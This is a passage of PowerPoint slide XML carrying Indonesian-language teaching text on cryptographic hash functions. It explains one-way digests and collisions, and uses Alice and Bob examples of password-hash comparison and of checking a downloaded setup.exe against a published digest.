              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>plainteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keluarannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedemikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>plainteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan agar input yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> output yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabrakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Bob dan Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>plainteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Alice. Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>plainteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonversinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digest Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash pada file. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, hash file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash pada file setup.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unduhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengunduh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file setup.exe dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada file setup.exe yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diunduh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
